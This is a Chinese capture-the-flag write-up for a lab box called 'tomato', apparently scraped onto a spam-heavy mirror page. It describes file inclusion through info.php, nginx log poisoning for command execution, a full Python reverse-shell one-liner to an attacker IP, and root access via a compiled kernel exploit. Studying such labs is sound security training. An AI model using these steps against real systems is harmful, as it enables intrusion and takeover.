当前位置: 首页 > news >正文

邢台做wap网站多少钱wordpress 响应 完整 模板

邢台做wap网站多少钱,wordpress 响应 完整 模板,wordpress主题制作软件,网站效果图用什么软件做难度 低(个人认为中) 目标 root权限 一个flag 使用VMware启动 kali 192.168.152.56 靶机 192.168.152.66 信息收集 端口信息收集 可以看到有个ftp服务#xff0c;2211实际是ssh协议端口#xff0c;80、8888是一个web服务 web测试 80端口显示一个tomato 查看源码给了一些…难度 低(个人认为中) 目标 root权限 一个flag 使用VMware启动 kali 192.168.152.56 靶机 192.168.152.66 信息收集 端口信息收集 可以看到有个ftp服务2211实际是ssh协议端口80、8888是一个web服务 web测试 80端口显示一个tomato 查看源码给了一些提示 先上dirseardh扫一遍 然后用gobuster的中等字典扫了一下也没有结果 8888端口需要密码登录 可能和前面给的一些提示有关 然后使用cewl命令爬取一下这个页面搞了个字典用hydra爆破了一下这个8888端口的服务发现也没有结果然后又爆破了一下ftp和ssh服务也没有结果 可能是字典不行换字典继续跑把kali的自带的seclectlist下面目录字典使用gobuster跑完了都没跑出来任何东西 看wp用dirb的可以跑出一个目录出来 以后打靶场没思路的时候把所有扫描工具全部上一遍。。。 用的这个的字典/usr/share/dirb/wordlists/common.txt。。。 进去可以看到一些源码内容 把能点的全部浏览了除了这三个图片还有两个txt和info.php其他都是空白没有其他有效的消息了 看着readme这个网站好像是一个wordpress的一个网站机器人插件用来反爬虫的 突破边界 我以为是要根据这个readme中的内容去官网找源码。。。我搞好了半天都没找到突破点 看了wp看info.php的源码。。。 做这种题只想暴打出题人到底是在打靶场还是打ctf 看到疑似加载本地资源的参数考虑是否存在任意文件读取php语言考虑文件包含以及搭配利用各种伪协议 通过信息可以看到这个tomato用户存在 然后继续利用这个文件包含尝试了一些可以命令执行的伪协议没有什么反应然后看能不能加载远程文件 但是查看信息发现allow_url_include为off只有下面两个都为on才支持远程文件包含 那么是否可以尝试包含session文件或者日志文件 经过我的尝试确定了日志文件的路径一些apache和nginx的路径去猜一下 /var/log/nginx/access.log 并且这个日志记录的是8888端口的访问记录就那个登录的包修改一些UA 可以看到记录也出现了 那么我们写一段php代码进去然后包含这个日志文件看执不执行 可以看到成功的执行了 那么可以直接写反弹shell的命令进行shell的反弹了 但是搞了半天没成功我不知道是不是里面有什么编码的问题写多了搞得这个日志都记录不进去了。只能换个日志选择nginx的错误日志同时在nginx的错误日志中发现了这个8888登录在使用/etc/nginx/.htpasswd文件中的内容进行判断然后读取这个文件读到了账号密码 ngnix:$apr1$azDw/Iwv$E7rIlqjeiX9Sx9.sMCcAZ0 拿这个密码去CMD5网站解密发现要钱。。算了还是继续文件包含吧 换了个文件成功的包含了 /var/log/nginx/error.log 这个文件会包含所有登录失败的请求路径和host那么这里修改host 成功的回显了数据 能稳定执行命令后尝试使用各种方式方式反弹shell最后使用python成功的吧shell反弹了回来 python3 -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.152.56,7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(/bin/bash) 拿到shell发现是www的权限 因为是直接使用python的pty反弹的所以已经是比较高级的shell了 提权 然后先上个信息收集的脚本linpeas.sh 一上来就是爆红 小于4.6的内核都可以考虑脏牛提权CVE-2016-5195 尝试脏牛然后发现靶机上面缺少了一些环境。。。这种情况最麻烦了 然后去找其他的利用方式 发现基本上使用c编译成的exp都会受限应该是在kali上面进行gcc用了靶机没有的东西 strings /lib/x86_64-linux-gnu/libc.so.6 |grep GLIBC_ 环境上最高才2.23只能下载一个带有低版本GLIBC的包然后gcc的使用这个包里的来编译下载2.1x的包就刚好 wget http://launchpadlibrarian.net/172657656/libc6_2.19-0ubuntu6_amd64.deb 然后使用dpkg -x解压 这里不用脏牛了用上面检测出的第二个 把这个c文件cp到当前目录 gcc 45010.c -o exp -Ldir ./libc6_2.19-0ubuntu6_amd64/lib/x86_64-linux-gnu/libc.so.6 然后上传上去赋予权限成功的提权 拿到flag 这种环境的原因真的好麻烦。另外内核漏洞的一些poc可以在这里找 GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合
http://www.pierceye.com/news/437517/

相关文章:

  • 建设网站的网站江苏旅游网站开发设计与实现
  • 河北辛集住房和城乡建设厅网站购车网站开发数据库er图
  • 简单flash个人网站网站服务器和直播服务器一样吗
  • 教育网站建设需求文档门户网站系统建设清单
  • 天津市建设与管理局网站建筑网建设通平台
  • 长沙网站开发微联讯点官网微信公众号直接同步到wordpress
  • 湖南建设监理官方网站属于网页制作平台的是?
  • 如何建设公司网站知乎湖南自驾旅游与房车协会
  • 扬中网站优化做 爱 网站视频教程
  • 服务器发布网站免费网络营销推广软件
  • 婚纱摄影类网站重庆seo招聘
  • 登陆空间商网站建站模板免费下载
  • 用php做网站用什么框架牡丹江免费发布信息的平台
  • 网站开发 专有名词江油移动网站建设
  • 百度后台管理东莞市长安镇网站制作优化
  • 长春市建设厅网站大自然的网站设计
  • 网站建设能用手机制作吗人人车网站建设费用
  • 网站开发技术部分网络营销的宏观环境
  • 南宁网站建设公司国外优秀网站案例
  • 做网站需要什么证件吗免费seo技术教程
  • 深圳银行网站建设wordpress 审批流
  • 网站开发设计怎么找客户做企业网站 空间怎么买
  • 怎么在搜索引擎里做网站网页wordpress文章新窗口
  • 企业网站功能对比分析新农村建设 网站
  • 公司网站营销公司做网站都咨询哪些问题
  • 洛阳网站建设价格做网站需要服务器还是主机
  • 北京企业网站制作哪家好做宠物网站导航应该写什么字
  • 做设计网站的工作怎么样郑州企业微网站建设
  • 青岛百度整站优化服务做网站都需要哪些费用
  • 新校区建设专题网站招聘H5在什么网站做最好